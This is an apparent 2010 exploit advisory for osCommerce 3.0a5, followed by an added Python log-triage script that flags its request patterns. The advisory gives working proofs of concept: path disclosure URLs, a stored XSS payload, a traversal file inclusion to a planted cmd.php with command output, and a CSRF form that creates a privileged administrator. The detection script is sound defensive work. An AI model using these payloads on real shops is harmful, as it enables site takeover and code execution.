
osCommerce v3.0a5 Multiple Vulnerabilities

Posted on 30 April 2010

# [Vendor SW]:     osCommerce
# [Version]:       3.0a5 (but possibly all versions)
# [Vendor URL]:    www.oscommerce.com
# [Tested on]:     Ubuntu Server 9.10
# [Category]:      Webapps/0day
#
# [Date]:          30 Apr 2010
# [Author]:        Alberto Fontanella
# [Author WEB]:    ictsec.wordpress.com
# [Author EMAIL]:  itsicurezza<0x40>yahoo.it
#
# inText:"Powered by osCommerce" -> 6.850.000

[ 1 ] - [ Full Path Disclosure ]

http://[host]/templates/default/content/index/product_listing.php
http://[host]/templates/default/content/info/info_contact.php
...etc

    Fatal error: Call to undefined function osc_image() in /var/www/templates/default/content/index/product_listing.php on line 16

http://[host]/includes/classes/search.php
...etc

    Warning: require(includes/classes/products.php) [function.require]: failed to open stream: No such file or directory in /var/www/includes/classes/search.php on line 15

    Fatal error: require() [function.require]: Failed opening required 'includes/classes/products.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/includes/classes/search.php on line 15

[ 2 ] - [ Persistent XSS ]

http://[host]/products.php?oscommerce-tshirt

Put in the Front field:

    <script>alert("XSS")</script>

Click "Add to Cart". The Checkout section then renders the stored script.

[ 3 ] - [ Local File Inclusion ]

http://[host]/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd
...etc

You have to put cmd.php in /

    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    Linux ubuntu 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux

[ 4 ] - [ XSRF ]

To create a new Administrator with Global Privileges:

    <html>
    <body>
    <form action="http://[host]/admin/index.php?administrators&action=save" method="post">
    <input type="text" name="user_name" value="haxor">
    <input type="text" name="user_password" value="hax0r">
    <input type="text" name="modules[]" value="0">
    <input type="hidden" name="subaction" value="confirm"/>
    <input type="submit" value="Save">
    </form>
    </body>
    </html>
...etc

[ EOF ]

# Inj3ct0r.com [2010-04-30]
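Added example, not part of the original advisory: a log triage script that flags the request patterns from items 1, 3 and 4 in a combined-format web server access log. Item 2 is not covered because the stored script travels in a POST body, which access logs do not record. The host name shop.example, the sample log lines and the label strings are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: files under these directories are include-only, never valid entry points.
INCLUDE_ONLY = re.compile(r"^/(templates/.+/content/|includes/classes/).+\.php$")
UNINSTALL = "/admin/includes/applications/services/pages/uninstall.php"
# Combined log format: client ident user [time] "METHOD target PROTO" status size "referer"
LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"')

def classify(line, site_host):
    """Return the advisory items (as labels) that one access-log line matches."""
    m = LINE.match(line)
    if not m:
        return []
    method, target, referer = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)
    query = parse_qs(url.query, keep_blank_values=True)  # decodes values once
    hits = []
    # Item 1: direct request for a file that is only meant to be included.
    if INCLUDE_ONLY.match(path):
        hits.append("1-direct-include-request")
    # Item 3: unquote() again so a double-encoded "../" (%252e%252e%252f) is also seen.
    if path == UNINSTALL and any(".." in unquote(v) for v in query.get("module", [])):
        hits.append("3-module-traversal")
    # Item 4: admin save whose Referer is absent or names another host. A triage
    # signal only: privacy tools strip Referer, so expect some false positives.
    if (method == "POST" and path == "/admin/index.php"
            and "administrators" in query and query.get("action") == ["save"]
            and urlsplit(referer).hostname != site_host):
        hits.append("4-cross-site-admin-save")
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical host shop.example).
T = "[30/Apr/2010:10:00:00 +0000]"
SAMPLE = [
    f'203.0.113.5 - - {T} "GET /templates/default/content/index/product_listing.php HTTP/1.1" 200 312 "-" "ua"',
    f'203.0.113.5 - - {T} "GET {UNINSTALL}?module=..%2F..%2Fcmd HTTP/1.1" 200 90 "-" "ua"',
    f'198.51.100.7 - - {T} "POST /admin/index.php?administrators&action=save HTTP/1.1" 302 0 "http://other.example/p.html" "ua"',
    f'198.51.100.7 - - {T} "POST /admin/index.php?administrators&action=save HTTP/1.1" 302 0 "http://shop.example/admin/index.php?administrators" "ua"',
    f'192.0.2.9 - - {T} "GET /products.php?oscommerce-tshirt HTTP/1.1" 200 5120 "-" "ua"',
]

def scan(lines, site_host="shop.example"):
    return [classify(line, site_host) for line in lines]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE, scan(SAMPLE)):
        print(hits or ["clean"], line.split('"')[1])
```

A hit on item 4 deserves a follow-up check of the administrators table for accounts created at that timestamp.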

 
